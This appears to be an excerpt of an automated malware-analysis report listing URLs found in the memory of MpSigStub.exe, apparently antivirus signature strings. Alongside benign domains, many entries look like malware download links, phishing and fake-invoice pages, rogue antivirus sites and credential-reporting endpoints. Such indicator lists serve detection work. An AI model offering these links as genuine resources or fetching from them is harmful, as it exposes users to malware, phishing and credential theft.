Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://videosoftonline.com/download
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/614.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/cnzz.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://w.robints.us/jf.htmlwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://web/cdr/DISP/plazma_2/backend/phone.php
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://webapp.torntv.com
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://webpatch.ragnarok.co.kr/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://websearch.gettango.com/?
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://weeshoppi.com/wp-includes/id4/m4hg5vm7xsh6utv.exe
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://wef.grassrooters.org/index.php?xhimdbkblrjlcia
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://wermeer.cn/wermeer/report.php?title=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://western.net.pk
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://westernpinesbelize.com/lmb/login%20pdf.html
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://wevx.xyz/post.php?uid=
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://wewewewewesesesesasbacwederffggffddsss.duckdns.org/svch/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://wgdteam.jconserv.net
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://whatami.us.to/tc
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://whenyouplaygood.com/s/gate.php?a
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://white.shougouji.top
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://wijmo.com/
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://win7updates.com/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://winantiviruspro.net/buy.php?affid=
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://winmediapackage.com/rd/out.php
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://winshow.biz/feat/
Source: MpSigStub.exe, 00000026.00000003.18331438770.00000138BD6F2000.00000004.00000001.sdmp	String found in binary or memory: http://wizzcaster.com/api/v
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://wmr-moneys.org/config/line.gif
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://woah90s.com/hqalzrakueii/nbsa
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://wojass.unitedcrew.netd
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://wordfiletransfertocustomer.mangospot.net/-.......................................-...........
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://wordgroup.bounceme.net/9cb6541e5b0d/
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://work-helper.com/files/client/OffersWizard.exex
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://workwear.shoppages.eu/tools/adobe.ph)
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://world4freeblog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://worldnit.com/ofi.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://worm.ws/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://wp.fanchen.cc/paid-invoice/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://wpitcher.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://wpr.mko.waw.pl/uploads/scheduler.txt
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://wsdygreenkegheedahatakankeadeshnaa30gas.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net//adv//
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://wsfgfdgrtyhgfd.net/adv/
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://wsus.chrobinson.com/scriptstothelocalcomputer
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://wtfismyip.com/text)echo
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://wvpt.net/invoice-receipt/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://ww.fbi.gov/worldwidedlogs/addtobase.asp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://wwsw.friendgreeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://www-search.net/?
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.%domain%/updates/check.html
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/MyFriends.jsp
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/mail/MailCompose.jsp?ToMemberId=%s
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.%s/searchbar.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.114.
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.114Oldest.com/zz/mm.htm
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.126.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.17173.com/
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.178gg.com/lianjie/
Source: MpSigStub.exe, 00000026.00000003.18417485708.00000138BD45E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/
Source: MpSigStub.exe, 00000026.00000003.18417485708.00000138BD45E000.00000004.00000001.sdmp	String found in binary or memory: http://www.180searchassistant.com/a
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.1882361.55freehost.com/voicemail.html)
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.19620425.com/download_adv/file.exe
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.22apple.com/?utm_source=b&ch=sof&uid=
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.22teens.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.2345.com/?18181
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.2828hfdy.com/bak.txt
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.3000.ws/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.31334.info/1stupload.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.3322.org/dyndns/getip
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.37db.cn/images/dis.htmwidth=0height=0
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.3800cc.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.455465x.com/test/IP.asp
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.4dots-software.com/installmonetizer/emptyfoldercleaner.php/silentget
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/291014_nj.exe?
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.4threquest.me/310714d/310714_br.exe?
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.51jetso.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.520hack.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.52CPS.COM/goto/mm.Htm
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.58816.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.58hex.com/databack.php
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.5z8.info/--initiate-credit-card-xfer--_g5l2og_autoinstall
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/city/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/navhtm/nav
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.6781.com/tools/#
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://www.77169.net/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.7sponsor.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.88vcd.com/htm/china/myb/send.asp?daqu=%s&xiaoqu=%s&user=%s&pass=%s&ckpass=%s&renwu=%s&lev
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.96333.com/
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.LuckyAcePoker.com/install
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.MalwareAlarm.com/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.PCKeeper.com
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.PlanetCpp.com
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.PriceFountain.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.Social2Search.com/privacy
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.adserver.com
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.advgoogle.blogdpot.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.agendagyn.com/media/fotos/2010/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.alexa.com
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.alibaba.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.amazon.com
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.apple.com
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.beidou123.cn/count.asp
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.blazingtools.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.cashon.co.kr/app/install.php?
